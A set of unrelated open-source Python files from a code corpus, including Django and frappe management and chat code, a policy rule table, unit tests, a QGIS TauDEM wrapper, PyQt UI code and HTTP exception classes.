            admin = Lageruser.objects.create_superuser('admin', 'admin@localhost', 'admin')
            for department in Department.objects.all():
                DepartmentUser.objects.create(user=admin, department=department)
| vIiRuS/Lagerregal | main/management/commands/populate.py | Python | bsd-3-clause | 7,197 |
__author__ = 'zhu'
| epokmedia/redmine-cli | redminecli/server/__init__.py | Python | mit | 19 |
# -*- coding: utf-8 -*-
import re
from django.core.management.base import NoArgsCommand, BaseCommand
# import commonware.log
# log = commonware.log.getLogger('bedrock')
from bedrock.mocotw.utils import newsletter_subscribe
# Sanity-check pattern for e-mail addresses.
# BUG FIX: the original used the character class [A-z], which spans
# ASCII 65-122 and therefore also matched the punctuation characters
# [ \ ] ^ _ ` lying between 'Z' and 'a'; [A-Za-z] is the intended range.
email_re = re.compile(r'^[_A-Za-z0-9-]+(\.[_A-Za-z0-9-]+)*@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*(\.[A-Za-z]{2,4})$')
class Command(BaseCommand):
    """Import newsletter subscriptions from a plain-text file of addresses."""
    help = 'Import subscriptions to Database.'
    option_list = NoArgsCommand.option_list
    def handle(self, *args, **options):
        self.options = options
        # Default input file; the first positional argument overrides it.
        filename = 'offline-subscriptions.txt'
        if args and len(args) > 0:
            filename = args[0]
        with open(filename, 'r') as file:
            subscriptions = file.readlines()
            count = 0
            # One address per line; lines that do not look like an
            # e-mail address are skipped silently.
            for subscription in subscriptions:
                email = subscription.strip()
                if email_re.match(email):
                    result = newsletter_subscribe(email)
                    # Count only subscriptions the backend accepted.
                    count += 1 if result else 0
            # file.write(subscription.u_email + '\n')
            # NOTE(review): this close() is redundant - the with-block
            # already closes the file on exit.
            file.close()
        print '%d new subscriptions.' % count
| elin-moco/bedrock | bedrock/mocotw/management/commands/import_subscriptions.py | Python | mpl-2.0 | 1,106 |
"""
byceps.services.ticketing.category_service
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2006-2020 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from typing import Dict, Optional, Sequence
from ...database import db
from ...typing import PartyID
from .models.category import Category as DbCategory
from .models.ticket import Ticket as DbTicket
from .transfer.models import TicketCategory, TicketCategoryID
def create_category(party_id: PartyID, title: str) -> TicketCategory:
    """Create a category for that party and persist it immediately."""
    db_category = DbCategory(party_id, title)

    db.session.add(db_category)
    db.session.commit()

    return _db_entity_to_category(db_category)
def count_categories_for_party(party_id: PartyID) -> int:
    """Return the number of categories for that party."""
    query = DbCategory.query.for_party(party_id)
    return query.count()
def find_category(category_id: TicketCategoryID) -> Optional[TicketCategory]:
    """Return the category with that ID, or `None` if not found."""
    category = DbCategory.query.get(category_id)

    # BUG FIX: `Query.get` returns `None` on a lookup miss; previously
    # that `None` was passed straight to `_db_entity_to_category`, which
    # raised an AttributeError instead of returning `None` as documented.
    if category is None:
        return None

    return _db_entity_to_category(category)
def get_categories_for_party(party_id: PartyID) -> Sequence[TicketCategory]:
    """Return all categories for that party as transfer objects."""
    db_categories = DbCategory.query \
        .for_party(party_id) \
        .all()

    return list(map(_db_entity_to_category, db_categories))
def get_categories_with_ticket_counts_for_party(
    party_id: PartyID
) -> Dict[TicketCategory, int]:
    """Return all categories with ticket counts for that party."""
    # Alias so the correlated subquery below can reference the outer
    # category row.
    category = db.aliased(DbCategory)

    # Scalar subquery: number of non-revoked tickets in each category.
    subquery = db.session \
        .query(
            db.func.count(DbTicket.id)
        ) \
        .join(DbCategory) \
        .filter(DbCategory.id == category.id) \
        .filter(DbTicket.revoked == False) \
        .subquery() \
        .as_scalar()

    rows = db.session \
        .query(
            category,
            subquery
        ) \
        .filter(category.party_id == party_id) \
        .group_by(category.id) \
        .all()

    return {
        _db_entity_to_category(category): ticket_count
        for category, ticket_count in rows
    }
def _db_entity_to_category(category: DbCategory) -> TicketCategory:
    """Convert a database entity into a category transfer object."""
    return TicketCategory(category.id, category.party_id, category.title)
| m-ober/byceps | byceps/services/ticketing/category_service.py | Python | bsd-3-clause | 2,371 |
import copy
from threading import Lock
import uuid
from naman.core.pypelib.persistence import PersistenceEngine
from naman.core.pypelib.resolver.Resolver import Resolver
from naman.core.pypelib.utils import Logger
from naman.core.pypelib.parsing.ParseEngine import ParseEngine
try:
import cPickle as pickle
except:
import pickle
'''
@author: msune,lbergesio,omoya,cbermudo,CarolinaFernandez
@organization: i2CAT, OFELIA FP7
PolicyEngine RuleTable class
Encapsulates logic of a simple Rule Table
'''
from naman.core.pypelib.Rule import TerminalMatch
from naman.core.pypelib.utils.Exceptions import *
class RuleEntry():
    """Pairs a parsed rule with a flag saying whether it is active."""
    # Class-level defaults, rebound per instance in __init__.
    rule = None
    enabled = True

    def __init__(self, rule, enabled=True):
        self.rule, self.enabled = rule, enabled
class RuleTable():
    """Ordered, mutex-protected list of RuleEntry objects evaluated in
    sequence, with a boolean default policy (True = ACCEPT) applied when no
    rule produces a terminal match. Optionally persisted via a pluggable
    persistence backend. NOTE: Python 2 code (print statements in dump()).
    """
    logger = Logger.getLogger()
    # Class-level defaults; every instance rebinds these in __init__.
    uuid=None
    name=None
    _persist = None
    _parser = None
    _persistenceBackend = None
    _persistenceBackendParameters=None
    #Default table policy
    _policy = None
    _ruleSet = None
    _mappings = None
    _mutex = None
    _resolver = None
    #Constructor
    def __init__(self,name,resolverMappings,defaultParser, defaultPersistence, defaultPersistenceFlag, pType = False, uuid = None,**kwargs):
        if not isinstance(pType,bool):
            raise Exception("Unknown default table policy")
        self.uuid = uuid
        self.name = name
        self._mutex = Lock()
        self._policy = pType
        self._parser = defaultParser
        self._persistenceBackend = defaultPersistence
        self._persist = defaultPersistenceFlag
        self._mappings = resolverMappings
        self._ruleSet = list()
        self._persistenceBackendParameters = kwargs
        # Persist immediately so the (still empty) table exists in the backend.
        if self._persist:
            self.save(self._persistenceBackend,**kwargs)
        #Generate the resolver
        self._resolver = Resolver(resolverMappings)
    #Deep copy
    def clone(self):
        #XXX: in principle mutex is not needed since methods calling clone() are already protected
        #with self._mutex:
        # The clone is created with persistence disabled (False) and gets no
        # mutex/resolver; it is a passive snapshot, not a working table.
        cpTable = RuleTable(self.name,None,self._parser,self._persistenceBackend, False,self._policy,self.uuid, **self._persistenceBackendParameters)
        cpTable._mutex = None
        cpTable._persist = copy.deepcopy(self._persist)
        cpTable._ruleSet = copy.deepcopy(self._ruleSet)
        cpTable._resolver = None
        return cpTable
    #Determine rule position
    def _getRuleIndex(self, rule):
        # Linear scan; returns None (not -1) when the rule is absent.
        for it in self._ruleSet:
            if it.rule == rule:
                return self._ruleSet.index(it)
        return None
    def getRule(self, index):
        return self._ruleSet[index].rule
    #Add, move and remove rule
    def addRule(self,string,enabled=True,pos=None,parser=None,pBackend=None,persist=True):
        if not parser:
            parser = self._parser
        rule = ParseEngine.parseRule(string, parser)
        rule.setUUID(uuid.uuid4().hex)
        with self._mutex:
            # NOTE(review): relies on Python 2 semantics — `None > int` is
            # False, so pos=None falls through to the elif/else. Under
            # Python 3 this comparison would raise TypeError.
            if pos > len(self._ruleSet):
                #raise Exception("Invalid position")
                self._ruleSet.append(RuleEntry(rule,enabled))
            elif pos !=None:
                self._ruleSet.insert(pos,RuleEntry(rule,enabled))
            else:
                self._ruleSet.append(RuleEntry(rule,enabled))
            if self._persist:
                self.save()
    def removeRule(self,rule=None, index=None):
        # Caller supplies either the rule object or its index.
        if (not rule) and (index == None):
            raise Exception("Unable to determine which rule to remove; you must specify either the rule or the index")
        with self._mutex:
            if index == None:
                index = self._getRuleIndex(rule)
            if index == None:
                raise Exception("Unable to find rule in the ruleSet")
            self._ruleSet.pop(index)
            if self._persist:
                self.save()
    def moveRule(self, newIndex, rule=None, index=None):
        if (not rule) and (index == None):
            raise Exception("Unable to determine which rule to move; you must specify either the rule or the index")
        with self._mutex:
            if index == None:
                index = self._getRuleIndex(rule)
            if index == None:
                raise Exception("Unable to find rule in the ruleSet")
            self._ruleSet.insert(newIndex, self._ruleSet.pop(index))
            if self._persist:
                self.save()
    def _modEnableRule(self, enable, rule=None,index=None):
        # Shared implementation for enableRule/disableRule.
        if (not rule) and (index == None):
            raise Exception("Unable to determine which rule to enable; you must specify either the rule or the index")
        with self._mutex:
            if index == None:
                index = self._getRuleIndex(rule)
            if index == None:
                raise Exception("Unable to find rule in the ruleSet")
            self._ruleSet[index].enabled = enable
            if self._persist:
                self.save()
    def enableRule(self, rule=None, index=None):
        return self._modEnableRule(True,rule,index)
    def disableRule(self, rule=None, index= None):
        return self._modEnableRule(False,rule,index)
    def setPolicy(self, policy):
        if not isinstance(policy,bool):
            raise Exception("Unknown default table policy")
        with self._mutex:
            self._policy = policy
            if self._persist:
                self.save()
    def setParser(self, parser):
        with self._mutex:
            self._parser = parser
            if self._persist:
                self.save()
    def setPersistenceBackend(self, persistenceBackend):
        with self._mutex:
            self._persistenceBackend = persistenceBackend
            if self._persist:
                self.save()
    def setPersistenceFlag(self, persistenceFlag):
        with self._mutex:
            self._persist = persistenceFlag
            if self._persist:
                self.save()
    def setMappings(self, mappings):
        with self._mutex:
            self._mappings = mappings
            if self._persist:
                self.save()
    def dump(self):
        # Debug helper; Python 2 print statements (typo "NUmber" is in the
        # original output and left untouched here).
        print "Table: "+self.name+" UUID: "+str(self.uuid)
        print "NUmber of rules: "+str(len(self._ruleSet))
        with self._mutex:
            i=0
            for it in self._ruleSet:
                print "[%s]:"%i +it.rule.dump()+ " Enabled: "+str(it.enabled)
                i+=1
            print "Default policy: "+str(self._policy)
    #Go through the table
    def evaluate(self,metaObj):
        #Iterate over ruleset
        # A rule signals a decision by raising TerminalMatch; value True
        # means ACCEPT (return True), anything else re-raises to the caller.
        # Rules that do not raise simply fall through to the next one.
        with self._mutex:
            for it in self._ruleSet:
                if it.enabled:
                    try:
                        it.rule.evaluate(metaObj,self._resolver)
                    except TerminalMatch as terminal:
                        if terminal.value:
                            return True
                        else:
                            raise terminal
            # No rule matched: apply the default policy.
            if self._policy:
                return self._policy
            else:
                raise Exception("Policy verification failed. Policy type is DENY")
    def save(self, pBackend=None,**kwargs):
        if not pBackend:
            pBackend = self._persistenceBackend
        if not kwargs:
            kwargs2 = self._persistenceBackendParameters
        else:
            kwargs2 = kwargs
        PersistenceEngine.save(self,pBackend,**kwargs2)
    #In general should not be called, use loadOrGenerate instead
    @staticmethod
    def load(name, resolverMappings, pBackend, **kwargs):
        return PersistenceEngine.load(name,pBackend,resolverMappings,**kwargs)
    @staticmethod
    def loadOrGenerate(name,resolverMappings,defaultParser, defaultPersistence, defaultPersistenceFlag, pType=False, uuid=None,**kwargs):
        try:
            return PersistenceEngine.load(name,defaultPersistence, resolverMappings, defaultParser,**kwargs)
        except ZeroPolicyObjectsReturned:
            # Nothing stored yet: create a fresh table.
            RuleTable.logger.warning("Unable to load RuleTable, generating a new one")
            return RuleTable(name,resolverMappings,defaultParser, defaultPersistence, defaultPersistenceFlag, pType, uuid,**kwargs)
        except MultiplePolicyObjectsReturned:
            RuleTable.logger.warning("Unable to load a single RuleTable, asking the user")
            raise MultiplePolicyObjectsReturned
        except Exception as e:
            # NOTE(review): this branch only logs and implicitly returns
            # None — callers receive None on unexpected load failures.
            RuleTable.logger.error("Unable to load RuleTable. Exception: %s" % str(e))
    '''
    Retrieves every Engine's PolicyRuleTable object for a given name.
    This method should be seldom used.
    '''
    @staticmethod
    def loadAll(name, defaultPersistence):
        return PersistenceEngine.loadAll(name, defaultPersistence)
    '''
    Deletes a Engine's PolicyRuleTable object for a given ID.
    This method should be seldom used.
    '''
    @staticmethod
    def delete(tableID, defaultPersistence):
        return PersistenceEngine.delete(tableID, defaultPersistence)
    #Getters
    def getRuleSet(self):
        return self._ruleSet
    def getName(self):
        return self.name
    def getPolicyType(self):
        return self._policy
    def getPersistence(self):
        return self._persistenceBackend
    def getParser(self):
        return self._parser
    def getResolverMappings(self):
        return self._mappings
    def getPersistenceFlag(self):
        return self._persist
| jpardobl/naman | naman/core/pypelib/RuleTable.py | Python | bsd-3-clause | 8,323 |
import unittest
from python_digits import HexDigit
class TestHexDigits(unittest.TestCase):
    """Unit tests for python_digits.HexDigit: construction from int/str,
    range validation (0x0-0xf), and int-like arithmetic behaviour.
    """
    def test_hd_instantiate(self):
        d = HexDigit(0x1)
        self.assertEqual(d, 0x1)
    def test_hd_instantiate_f(self):
        # Upper boundary of a single hex digit.
        d = HexDigit(0xf)
        self.assertEqual(d, 0xf)
    def test_hd_instantiate_int(self):
        d = HexDigit(5)
        self.assertEqual(d, 0x5)
    def test_hd_instantiate_str(self):
        # Accepts a "0x"-prefixed string.
        d = HexDigit("0x5")
        self.assertEqual(d, 0x5)
    def test_hd_string_value(self):
        # Also accepts a bare hex-digit string.
        d = HexDigit("f")
        self.assertEqual(d, 0xf)
    def test_hd_bad_hexstr(self):
        # Non-hex characters must be rejected.
        with self.assertRaises(ValueError):
            d = HexDigit('0xh')
    def test_hd_too_high(self):
        # Values above 0xf do not fit in one digit.
        with self.assertRaises(ValueError):
            d = HexDigit(0xf2)
    def test_hd_too_low(self):
        with self.assertRaises(ValueError):
            d = HexDigit(-2)
    def test_hd_no_value(self):
        # The value argument is mandatory.
        with self.assertRaises(TypeError):
            d = HexDigit()
    def test_hd_acts_as_int(self):
        # HexDigit should participate in integer arithmetic.
        d1 = HexDigit(0xf)
        d2 = HexDigit(4)
        self.assertEqual(d1 * d2, 60)
| dsandersAzure/python_digits | python_digits/tests/TestHexDigit.py | Python | apache-2.0 | 1,131 |
from unittest import TestCase
import pygame
from ..config import BRICK_IMAGES, START_LEVEL, BLIP
from .. import asset
class TestAsset(TestCase):
    """Tests for the breakout asset loader (images, sounds, level files).

    NOTE: test_load_image, test_load_sound and test_save_level end in
    ``assertTrue(False)`` — they are deliberately failing placeholders still
    waiting for real assertions, not accidental bugs.
    """
    def setUp(self):
        # Asset loading requires an initialised pygame.
        pygame.init()
    def test_load_image(self):
        img = asset.load_image(BRICK_IMAGES['red'])
        self.assertTrue(False)
    def test_load_sound(self):
        snd = asset.load(BLIP)
        self.assertTrue(False)
    def test_load_level(self):
        # A level is a mapping with metadata plus a 10x10 grid of brick
        # colour names, each of which must be a known brick image key.
        level = asset.load_level(START_LEVEL)
        self.assertIn('name', level)
        self.assertIn('ball_speed', level)
        self.assertIn('next', level)
        self.assertIn('bricks', level)
        self.assertEqual(10, len(level['bricks']))
        for row in level['bricks']:
            self.assertEqual(10, len(row))
        for row in level['bricks']:
            for color in row:
                self.assertIn(color, BRICK_IMAGES)
    def test_save_level(self):
        self.assertTrue(False)
    def tearDown(self):
        pygame.quit()
| Oisota/Breakout | breakout/tests/test_asset.py | Python | gpl-3.0 | 994 |
import _plotly_utils.basevalidators
class ArrayValidator(_plotly_utils.basevalidators.DataArrayValidator):
    """Validator for the ``array`` data property of ``bar.error_x``."""

    def __init__(self, plotly_name="array", parent_name="bar.error_x", **kwargs):
        # Pull overridable defaults out of kwargs before delegating.
        edit_type = kwargs.pop("edit_type", "calc")
        role = kwargs.pop("role", "data")
        super(ArrayValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type=edit_type,
            role=role,
            **kwargs
        )
| plotly/python-api | packages/python/plotly/plotly/validators/bar/error_x/_array.py | Python | mit | 442 |
class InvalidTracebackError(Exception):
    """Raised when a traceback cannot be parsed.

    ``linenum`` is the 1-based line at which parsing failed, or -1 when the
    position is unknown (omitted from the message in that case).
    """

    def __init__(self, linenum=-1):
        self.linenum = linenum
        # Bug fix: the original used `super(self.__class__, self)`, which
        # resolves against the *runtime* class and causes infinite recursion
        # as soon as this exception is subclassed. Name the class explicitly.
        super(InvalidTracebackError, self).__init__()

    def __str__(self):
        details = ": at line %d" % self.linenum if self.linenum > 0 else ""
        return "InvalidTracebackError" + details
| kde713/python-tbparser | tbparser/exceptions.py | Python | apache-2.0 | 303 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
slopearea_multi.py
---------------------
Date : March 2015
Copyright : (C) 2015 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'March 2015'
__copyright__ = '(C) 2015, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from PyQt4.QtGui import QIcon
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.ProcessingConfig import ProcessingConfig
from processing.core.GeoAlgorithmExecutionException import \
GeoAlgorithmExecutionException
from processing.core.parameters import ParameterFile
from processing.core.parameters import ParameterNumber
from processing.core.outputs import OutputDirectory
from TauDEMUtils import TauDEMUtils
class SlopeAreaMulti(GeoAlgorithm):
    """Processing wrapper around TauDEM's multifile `slopearea` tool:
    computes S^m * A^n from a slope grid and a contributing-area grid,
    executed via mpiexec.
    """
    # Parameter / output identifiers used by the Processing framework.
    SLOPE_GRID = 'SLOPE_GRID'
    AREA_GRID = 'AREA_GRID'
    SLOPE_EXPONENT = 'SLOPE_EXPONENT'
    AREA_EXPONENT = 'AREA_EXPONENT'
    SLOPE_AREA_GRID = 'SLOPE_AREA_GRID'
    def getIcon(self):
        return QIcon(os.path.dirname(__file__) + '/../../images/taudem.png')
    def defineCharacteristics(self):
        # Declare display name, group, inputs and outputs for the toolbox.
        self.name, self.i18n_name = self.trAlgorithm('Slope Area Combination (multifile)')
        self.cmdName = 'slopearea'
        self.group, self.i18n_group = self.trAlgorithm('Stream Network Analysis tools')
        self.addParameter(ParameterFile(self.SLOPE_GRID,
                          self.tr('Slope Grid'), True, False))
        self.addParameter(ParameterFile(self.AREA_GRID,
                          self.tr('Contributing Area Grid'), True, False))
        self.addParameter(ParameterNumber(self.SLOPE_EXPONENT,
                          self.tr('Slope Exponent'), 0, None, 2))
        self.addParameter(ParameterNumber(self.AREA_EXPONENT,
                          self.tr('Area Exponent'), 0, None, 1))
        self.addOutput(OutputDirectory(self.SLOPE_AREA_GRID,
                       self.tr('Slope Area Grid')))
    def processAlgorithm(self, progress):
        # Assemble the mpiexec command line:
        #   mpiexec -n <procs> <taudem>/slopearea -slp ... -sca ... -par m n -sa <out>
        commands = []
        commands.append(os.path.join(TauDEMUtils.mpiexecPath(), 'mpiexec'))
        processNum = ProcessingConfig.getSetting(TauDEMUtils.MPI_PROCESSES)
        if processNum <= 0:
            raise GeoAlgorithmExecutionException(
                self.tr('Wrong number of MPI processes used. Please set '
                        'correct number before running TauDEM algorithms.'))
        commands.append('-n')
        commands.append(unicode(processNum))
        commands.append(os.path.join(TauDEMUtils.taudemMultifilePath(), self.cmdName))
        commands.append('-slp')
        commands.append(self.getParameterValue(self.SLOPE_GRID))
        commands.append('-sca')
        commands.append(self.getParameterValue(self.AREA_GRID))
        commands.append('-par')
        commands.append(unicode(self.getParameterValue(self.SLOPE_EXPONENT)))
        commands.append(unicode(self.getParameterValue(self.AREA_EXPONENT)))
        commands.append('-sa')
        commands.append(self.getOutputValue(self.SLOPE_AREA_GRID))
        TauDEMUtils.executeTauDEM(commands, progress)
| siliconsmiley/QGIS | python/plugins/processing/algs/taudem/slopearea_multi.py | Python | gpl-2.0 | 3,833 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'MyUI/MyWidgetUI.ui'
#
# Created: Tue Apr 1 09:44:10 2014
# by: PyQt4 UI code generator 4.10.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
# Compatibility shims for different PyQt4 API versions.
try:
    _fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
    # API v2 / Python 3: QString does not exist, strings pass through as-is.
    def _fromUtf8(s):
        return s
try:
    _encoding = QtGui.QApplication.UnicodeUTF8
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
    # Newer PyQt without UnicodeUTF8: translate takes no encoding argument.
    def _translate(context, text, disambig):
        return QtGui.QApplication.translate(context, text, disambig)
class Ui_Form(object):
    """Auto-generated by pyuic4 from MyWidgetUI.ui — a form holding a line
    edit and a push button whose clicked() signal triggers actionPrintText.
    Do not hand-edit the widget setup: regenerating the file discards changes.
    """
    def setupUi(self, Form):
        # Build the widget tree and wire signals; called once per Form.
        Form.setObjectName(_fromUtf8("Form"))
        Form.resize(400, 300)
        self.horizontalLayoutWidget = QtGui.QWidget(Form)
        self.horizontalLayoutWidget.setGeometry(QtCore.QRect(59, 29, 191, 211))
        self.horizontalLayoutWidget.setObjectName(_fromUtf8("horizontalLayoutWidget"))
        self.horizontalLayout = QtGui.QHBoxLayout(self.horizontalLayoutWidget)
        self.horizontalLayout.setMargin(0)
        self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
        self.lineEdit = QtGui.QLineEdit(self.horizontalLayoutWidget)
        self.lineEdit.setObjectName(_fromUtf8("lineEdit"))
        self.horizontalLayout.addWidget(self.lineEdit)
        self.pushButton = QtGui.QPushButton(self.horizontalLayoutWidget)
        self.pushButton.setObjectName(_fromUtf8("pushButton"))
        self.horizontalLayout.addWidget(self.pushButton)
        self.actionPrintText = QtGui.QAction(Form)
        self.actionPrintText.setObjectName(_fromUtf8("actionPrintText"))
        self.retranslateUi(Form)
        # Button click fires the action (old-style signal/slot connection).
        QtCore.QObject.connect(self.pushButton, QtCore.SIGNAL(_fromUtf8("clicked()")), self.actionPrintText.trigger)
        QtCore.QMetaObject.connectSlotsByName(Form)
    def retranslateUi(self, Form):
        # Install (re-)translated user-visible strings.
        Form.setWindowTitle(_translate("Form", "Form", None))
        self.pushButton.setText(_translate("Form", "PushButton", None))
        self.actionPrintText.setText(_translate("Form", "PrintText", None))
| DTUWindEnergy/Python4WindEnergy | lesson 6/results/ebra/MyUI/MyWidgetUI.py | Python | apache-2.0 | 2,193 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.desk.notifications import delete_notification_count_for
from frappe.core.doctype.user.user import STANDARD_USERS
from frappe.utils import cint
from frappe import _
@frappe.whitelist()
def get_list(arg=None):
	"""get list of messages"""
	# Paginate straight from the request's form data; `user` is forced to
	# the session user so a client cannot read someone else's chat.
	frappe.form_dict['start'] = int(frappe.form_dict['start'])
	frappe.form_dict['page_length'] = int(frappe.form_dict['page_length'])
	frappe.form_dict['user'] = frappe.session['user']
	# set all messages as read
	frappe.db.sql("""UPDATE `tabCommunication` set seen = 1
		where
			communication_type in ('Chat', 'Notification')
			and seen = 0
			and reference_doctype = 'User'
			and reference_name = %s""", frappe.session.user)
	delete_notification_count_for("Chat")
	# Request the framework to commit the seen-flag update at request end.
	frappe.local.flags.commit = True
	fields = '''name, owner, modified, content, communication_type,
		comment_type, reference_doctype, reference_name'''
	# Three query shapes: Bot transcript, own notifications, or a two-way
	# conversation with another user. Parameters are bound via form_dict.
	if frappe.form_dict.contact == 'Bot':
		return frappe.db.sql("""select {0} from `tabCommunication`
			where
				comment_type = 'Bot'
				and reference_doctype = 'User'
				and reference_name = %(user)s
			order by creation desc
			limit %(start)s, %(page_length)s""".format(fields),
				frappe.local.form_dict, as_dict=1)
	if frappe.form_dict.contact == frappe.session.user:
		# return messages
		return frappe.db.sql("""select {0} from `tabCommunication`
			where
				communication_type in ('Chat', 'Notification')
				and comment_type != 'Bot'
				and reference_doctype ='User'
				and (owner=%(contact)s
					or reference_name=%(user)s
					or owner=reference_name)
			order by creation desc
			limit %(start)s, %(page_length)s""".format(fields),
				frappe.local.form_dict, as_dict=1)
	else:
		return frappe.db.sql("""select {0} from `tabCommunication`
			where
				communication_type in ('Chat', 'Notification')
				and comment_type != 'Bot'
				and reference_doctype ='User'
				and ((owner=%(contact)s and reference_name=%(user)s)
					or (owner=%(user)s and reference_name=%(contact)s))
			order by creation desc
			limit %(start)s, %(page_length)s""".format(fields),
				frappe.local.form_dict, as_dict=1)
@frappe.whitelist()
def get_active_users():
	# Enabled, non-website users (standard accounts excluded) with a flag
	# telling whether they had a session update within the last hour.
	data = frappe.db.sql("""select name,
		(select count(*) from tabSessions where user=tabUser.name
			and timediff(now(), lastupdate) < time("01:00:00")) as has_session
	 	from tabUser
		where enabled=1 and
		ifnull(user_type, '')!='Website User' and
		name not in ({})
		order by first_name""".format(", ".join(["%s"]*len(STANDARD_USERS))), STANDARD_USERS, as_dict=1)
	# make sure current user is at the top, using has_session = 100
	users = [d.name for d in data]
	if frappe.session.user in users:
		data[users.index(frappe.session.user)]["has_session"] = 100
	else:
		# in case of administrator
		data.append({"name": frappe.session.user, "has_session": 100})
	# System Managers additionally see the Bot pseudo-user.
	if 'System Manager' in frappe.get_roles():
		data.append({"name": "Bot", "has_session": 100})
	return data
@frappe.whitelist()
def post(txt, contact, parenttype=None, notify=False, subject=None):
	"""post message"""
	comment_type = None
	# Messages to the Bot are stored against the sender themselves, tagged
	# with comment_type 'Bot'.
	if contact == 'Bot':
		contact = frappe.session.user
		comment_type = 'Bot'
	d = frappe.new_doc('Communication')
	# A parenttype marks this as a notification rather than a chat message.
	d.communication_type = 'Notification' if parenttype else 'Chat'
	d.subject = subject
	d.content = txt
	d.reference_doctype = 'User'
	d.reference_name = contact
	d.sender = frappe.session.user
	if comment_type:
		d.comment_type = comment_type
	d.insert(ignore_permissions=True)
	delete_notification_count_for("Chat")
	# `notify` arrives as a string from the client; cint coerces it.
	if notify and cint(notify):
		_notify(contact, txt, subject)
	return d
@frappe.whitelist()
def delete(arg=None):
	# Delete the Communication named in the request form data; permission
	# checks are handled by the document's own delete flow.
	frappe.get_doc("Communication", frappe.form_dict['name']).delete()
def _notify(contact, txt, subject=None):
	"""Best-effort email notification about a new chat message.

	`contact` may be a single user name/email or a list of recipients.
	Outgoing-email failures are deliberately swallowed so a broken mail
	setup never blocks posting the message itself.
	"""
	from frappe.utils import get_fullname, get_url
	try:
		if not isinstance(contact, list):
			# Resolve the user record to an email address, falling back to
			# the raw value if no User matches.
			contact = [frappe.db.get_value("User", contact, "email") or contact]
		frappe.sendmail(\
			recipients=contact,
			sender= frappe.db.get_value("User", frappe.session.user, "email"),
			subject=subject or _("New Message from {0}").format(get_fullname(frappe.session.user)),
			template="new_message",
			args={
				"from": get_fullname(frappe.session.user),
				"message": txt,
				"link": get_url()
			},
			header=[_('New Message'), 'orange'])
	except frappe.OutgoingEmailError:
		# Intentional: notification is best-effort only.
		pass
| mbauskar/frappe | frappe/desk/page/chat/chat.py | Python | mit | 4,437 |
# -*- coding: utf-8 -*-
class HTTPException(Exception):
    """Common base for all exceptions that map onto an HTTP error code.

    Subclasses pin :attr:`status` and :attr:`name` to a specific code from
    RFC 2616 and pass a human-readable :attr:`descr` along.
    """

    def __init__(self, status, name, descr):
        """
        :param status: The desired http error-code (404, 500, ...)
        :type status: int
        :param name: Name as of RFC 2616
        :type name: str
        :param descr: Human-readable description of that error
        :type descr: str
        """
        super(HTTPException, self).__init__()
        self.status, self.name, self.descr = status, name, descr

    def process(self):
        """Hook invoked by the server; the default implementation does nothing."""
        pass
class BadRequest(HTTPException):
    """400 Bad Request. Not used inside the server."""

    def __init__(self, descr="The request your browser sent cannot be fulfilled due to bad syntax."):
        super(BadRequest, self).__init__(status=400, name="Bad Request", descr=descr)
class Redirect(HTTPException):
    """
    Causes an 303 - See Other (or 302 - Found if requested / 301 - Moved Permanently) redirect
    """
    def __init__(self, url, descr="Redirect", status=303):
        # Bug fix: the super call previously hard-coded status=303, silently
        # ignoring the `status` argument and making the promised 301/302
        # redirects impossible. Forward the parameter instead.
        super(Redirect, self).__init__(status=status, name="Redirect", descr=descr)
        # Target URL the client should be redirected to.
        self.url = url
class Unauthorized(HTTPException):
    """401 Unauthorized.

    Raised whenever a request hits a path protected by canAccess() or a
    canAdd/canEdit/... function inside an application returns false.
    """

    def __init__(self, descr="The resource is protected and you don't have the permissions."):
        super(Unauthorized, self).__init__(status=401, name="Unauthorized", descr=descr)
class PaymentRequired(HTTPException):
    """402 Payment Required - reserved status code, unused by the server
    and currently unsupported by clients."""

    def __init__(self, descr="Payment Required"):
        super(PaymentRequired, self).__init__(status=402, name="Payment Required", descr=descr)
class Forbidden(HTTPException):
    """403 Forbidden. Not used inside the server; may later distinguish
    logged-in users lacking permission from guests."""

    def __init__(self, descr="The resource is protected and you don't have the permissions."):
        super(Forbidden, self).__init__(status=403, name="Forbidden", descr=descr)
class NotFound(HTTPException):
    """404 Not Found. Usually raised in view() methods when the given key
    is invalid."""

    def __init__(self, descr="The requested resource could not be found."):
        super(NotFound, self).__init__(status=404, name="Not Found", descr=descr)
class MethodNotAllowed(HTTPException):
    """405 Method Not Allowed. Raised for functions without the @exposed /
    @internalExposed decorator, or GET requests to @forcePost functions."""

    def __init__(self, descr="Method Not Allowed"):
        super(MethodNotAllowed, self).__init__(status=405, name="Method Not Allowed", descr=descr)
class NotAcceptable(HTTPException):
    """406 Not Acceptable. Signals that the supplied parameters don't match
    the function signature."""

    def __init__(self, descr="The request cannot be processed due to missing or invalid parameters."):
        super(NotAcceptable, self).__init__(status=406, name="Not Acceptable", descr=descr)
class RequestTimeout(HTTPException):
    """408 Request Timeout. Used by the task api to indicate a retry."""

    def __init__(self, descr="The request has timed out."):
        super(RequestTimeout, self).__init__(status=408, name="Request Timeout", descr=descr)
class Gone(HTTPException):
    """410 Gone. Not used inside the server."""

    def __init__(self, descr="Gone"):
        super(Gone, self).__init__(status=410, name="Gone", descr=descr)
class PreconditionFailed(HTTPException):
    """412 Precondition Failed. Mostly caused by a missing or invalid
    securitykey."""

    def __init__(self, descr="Precondition Failed"):
        super(PreconditionFailed, self).__init__(status=412, name="Precondition Failed", descr=descr)
class RequestTooLarge(HTTPException):
